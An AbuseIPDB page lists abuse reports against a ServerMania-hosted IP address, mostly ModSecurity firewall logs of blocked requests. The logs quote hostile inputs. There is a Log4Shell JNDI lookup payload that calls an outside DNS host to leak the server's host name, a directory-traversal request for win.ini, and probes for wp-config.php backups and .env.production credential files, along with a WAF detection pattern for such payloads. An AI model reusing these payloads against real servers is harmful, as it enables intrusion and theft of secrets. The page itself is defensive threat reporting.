JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 38.154.191.241

38.154.191.241 was found in our database!

This IP was reported 11 times. Confidence of Abuse is 0%: ?

ISP	Server Mania Inc.
Usage Type	Data Center/Web Hosting/Transit
ASN	AS55286
Domain Name	servermania.com
Country	🇺🇸 United States of America
City	Piscataway, New Jersey

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 38.154.191.241

Whois 38.154.191.241

IP Abuse Reports for 38.154.191.241:

This IP address has been reported a total of 11 times from 7 distinct sources. 38.154.191.241 was first reported on August 27th 2023, and the most recent report was 1 month ago.

Old Reports: The most recent abuse report for this IP address is from 1 month ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
Anonymous	2026-05-06 08:10:03 (1 month ago)	\| A web attack returned code 200 (success).	Web App Attack Hacking SQL Injection
🇺🇸 TPI-Abuse	2026-04-02 16:19:46 (2 months ago)	(mod_security) mod_security (id:210492) triggered by 38.154.191.241 (-): 1 in the last 300 secs; Por ... show more (mod_security) mod_security (id:210492) triggered by 38.154.191.241 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Apr 02 12:19:41.945884 2026] [security2:error] [pid 18155:tid 18206] [client 38.154.191.241:40259] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "kettlehill.com"] [uri "/wp-config.php-backup"] [unique_id "ac6XHYRDXvwztGqRaJt5vwAAARU"], referer: https://www.kettlehill.com/wp-config.php-backup show less	Brute-Force Bad Web Bot Web App Attack
🇧🇬 Stoyko Stoykov	2026-03-18 20:40:42 (3 months ago)	38.154.191.241 - - [18/Mar/2026:22:40:42 +0200] "GET /..../..../..../..../..../..../..../..../..../w ... show more 38.154.191.241 - - [18/Mar/2026:22:40:42 +0200] "GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" ... show less	Hacking Web App Attack
🇮🇹 Pengu	2026-03-06 19:13:44 (3 months ago)	Web application attack blocked by WAF	Web App Attack
🇺🇸 TPI-Abuse	2026-02-01 11:21:16 (4 months ago)	(mod_security) mod_security (id:248270) triggered by 38.154.191.241 (-): 1 in the last 300 secs; Por ... show more (mod_security) mod_security (id:248270) triggered by 38.154.191.241 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Feb 01 06:21:09.008885 2026] [security2:error] [pid 16723:tid 16829] [client 38.154.191.241:45043] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\$\\\\{jndi:(ldaps?\|rmi\|dns\|iiop\|nis\|nds\|corba\|\\\\$\\\\{(?:lower\|upper)):" at ARGS:x. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j\|\|www.kettlehill.kettlehill.com:80\|F\|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.kettlehill.kettlehill.com"] [uri "/"] [unique_id "aX83Jf0s_0SzhyBvLdiuvAAAAxg"], referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d5vjdnq4eq3dbl1dehe0nar5nmtaknkpa.rsfi.info} show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2026-01-16 07:29:47 (5 months ago)	(mod_security) mod_security (id:210730) triggered by 38.154.191.241 (-): 1 in the last 300 secs; Por ... show more (mod_security) mod_security (id:210730) triggered by 38.154.191.241 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Jan 16 02:29:39.214502 2026] [security2:error] [pid 22599:tid 22599] [client 38.154.191.241:51247] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy\|\|ftp.nbcnewsradio.com\|F\|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "ftp.nbcnewsradio.com"] [uri "/config.php.bak"] [unique_id "aWno42fO8zYE2rkBmvxrogAAAAk"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-12-02 23:26:45 (6 months ago)	(mod_security) mod_security (id:210492) triggered by 38.154.191.241 (-): 1 in the last 300 secs; Por ... show more (mod_security) mod_security (id:210492) triggered by 38.154.191.241 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Dec 02 18:26:38.021209 2025] [security2:error] [pid 19257:tid 19257] [client 38.154.191.241:38907] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "webdisk.farmers123.com"] [uri "/.env.production"] [unique_id "aS91rpUiyyJ0U_4PSGfASQAAAA4"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-11-12 16:53:11 (7 months ago)	(mod_security) mod_security (id:210492) triggered by 38.154.191.241 (-): 1 in the last 300 secs; Por ... show more (mod_security) mod_security (id:210492) triggered by 38.154.191.241 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Nov 12 11:53:07.790723 2025] [security2:error] [pid 28515:tid 28515] [client 38.154.191.241:36021] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "nbcnewsradio.com"] [uri "/.env.production"] [unique_id "aRS7c3T5tyR8hROQVh7m7QAAAAc"] show less	Brute-Force Bad Web Bot Web App Attack
🇩🇪 SCHAPPY	2025-08-21 09:40:08 (10 months ago)	IP was involved in L7 DDoS attack.	DDoS Attack
Anonymous	2024-10-11 10:47:00 (1 year ago)	Port Scanning	Port Scan
🇺🇸 nowyouknow	2023-08-27 03:27:34 (2 years ago)	(From [email protected]) Is this your website kirokidz.com?	Phishing Web Spam

Showing 1 to 11 of 11 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 2607:f8b0:4001:c13::127

🇭🇰 190.92.239.22

🇻🇳 116.99.171.38

🇺🇸 20.65.193.176

🇺🇸 2a09:bac5:6d76:e3c::16b:135

🇺🇸 198.23.128.26

🇺🇸 185.92.182.129

🇨🇳 115.56.238.174

🇨🇳 113.88.57.86

🇷🇺 104.28.230.243

🇱🇹 62.60.130.237

🇬🇧 51.68.200.137

🇺🇸 40.124.173.173

🇳🇱 204.76.203.206

🇲🇽 201.149.53.243

🇪🇹 196.188.93.169

🇬🇧 167.99.199.1

🇲🇦 160.178.207.143

🇺🇸 143.198.239.107

🇮🇪 128.251.36.118